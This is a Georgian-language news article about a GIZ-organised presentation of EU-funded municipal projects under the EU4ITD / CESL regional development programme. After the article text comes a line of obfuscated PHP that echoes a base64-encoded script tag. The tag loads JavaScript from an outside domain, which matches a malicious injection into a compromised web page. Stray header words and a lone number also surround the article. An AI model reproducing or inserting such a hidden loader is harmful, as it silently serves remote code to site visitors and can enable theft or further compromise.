celsiusi
ავერსი შნაიდერი

11 ივლისს ევროკავშირის მხარდაჭერით, გერმანიის საერთაშორისო თანამშრომლობის საზოგადოების (GIZ) ორგანიზებით და საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს პატრონაჟით, პროგრამის „ევროკავშირი ინტეგრირებული ტერიტორიული განვითარებისთვის (EU4ITD) – ეკონომიკური და სოციალური  ცხოვრების კატალიზატორი“ (CESL) ფარგლებში დაფინანსებული, მუნიციპალური ინტეგრირებული პროექტების პრეზენტაცია გაიმართა  სასტუმრო „სტამბაში“.

ღონისძიება გახსნეს და სტუმრებს მისასალმებელი სიტყვით მიმართეს საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრის მოადგილე მზია გიორგობიანმა; საქართველოში ევროკავშირის წარმომადგენლობის განვითარების და თანამშრომლობის განყოფილების ხელმძღვანელმა, ნიკოლას სენდეროვიჩმა; გერმანიის საელჩოს სამხრეთ კავკასიის განვითარების თანამშრომლობის განყოფილების ხელმძღვანელმა, ლიდია ქრისტმანმა; GIZ – საქართველოს რეგიონალურმა დირექტორმა სანდრა, შენკემ და GIZ – ის პროექტის CESL მთავარმა ხელმძღვანელმა, ჰოვარდ ჰარდინგმა.

ღონისძიების ძირითადი მიზანს წარმოადგენდა, 14 მუნიციპალიტეტის მერს მისცემოდა შესაძლებლობა, წარმოედგინა CESL პროექტის ფარგლებში დასაფინანსებლად შერჩეული ინიციატივები. მაგალითისთვის, ასეთი საგრანტო  პროექტებია: კოლხეთის ეროვნული პარკის ინფრასტრუქტურის გაუმჯობესება, ბაღდადის ღვინის თანამედროვე ლაბორატორიის მოწყობა, დედოფლისწყაროს მხარეთმცოდნეობის მუზეუმის რეაბილიტაცია.  ღონისძიების ფარგლებში, ასევე წარმოდგენილი იქნა შერჩეული მუნიციპალიტეტების ბენეფიციართა მიერ წარმოებული სხვადასხვა პროდუქცია. ღონისძეიებაში მონაწილეობა მიიღეს, საქართველოს ოთხი რეგიონის: გურიის, იმერეთის, კახეთის, რაჭა-ლეჩხუმისა და ქვემო სვანეთის ადგილობრივმა, სამოქალაქო საზოგადოების და სხვადასხვა დონორი ორგანიზაციის წარმომადგენელმა. მოწვეულ სტუმრებს შორის, ასევე წარმოდგენილი იყვნენ, საქართველოს რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს, საქართველოში ევროკავშირისა და საქართველოში გერმანიის ფედერაციული რესპუბლიკის საელჩოს 100-მდე სტუმარი.

ევროკავშირის 6.5 მილიონი ევროს დაფინანსებით, ხოლო გერმანიის ეკონომიკური თანამშრომლობისა და განვითარების ფედერალური სამინისტროს ერთი მილიონი ევროს კონტრიბუციით, GIZ 4-წლიან პროგრამას – EU4ITD – „ეკონომიკური და სოციალური ცხოვრების კატალიზატორი“ ახორციელებს, რათა გამოავლინოს გამოუყენებელი ეკონომიკური და სოციალური პოტენციალი საქართველოს ოთხ რეგიონში – გურია, იმერეთი, კახეთი და რაჭა-ლეჩხუმი/ქვემო სვანეთი.  პროექტის მიზანია, მოხდეს არსებული, მაგრამ აუთვისებელი პოტენციალის „კატალიზირება“, დადებითი ეკონომიკური და სოციალური შედეგების მისაღწევად.  შესაბამისად, პროგრამა მიზნად ისახავს, საშუალო და გრძელვადიან პერსპექტივაში, რეგიონებიდან მიგრაციის შემცირებას და იმ მოსახლეობის რაოდენობის მნიშვნელოვან ზრდას, რომლებიც საქართველოს რეგიონებში, საცხოვრებლად გადასვლას ამჯობინებენ. პროექტი, ძირითადად  მუნიციპალიტეტებთან და კერძო სექტორთან თანამშრომლობს და თითქმის ოთხი წელი (2025 წლის სექტემბრამდე) გაგრძელდება. პროექტის ფარგლებში დაფინანსებული  ინიციატივები (მაგ. ინფრასტრუქტურა, აღჭურვილობა) გამიზნულია ხელი შუწყოს, ადგილობრივი თვითმმართველობის, კერძო სექტორისა და სამოქალაქო საზოგადოების დაახლოვებასა და თანამშრომლობას.

286
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");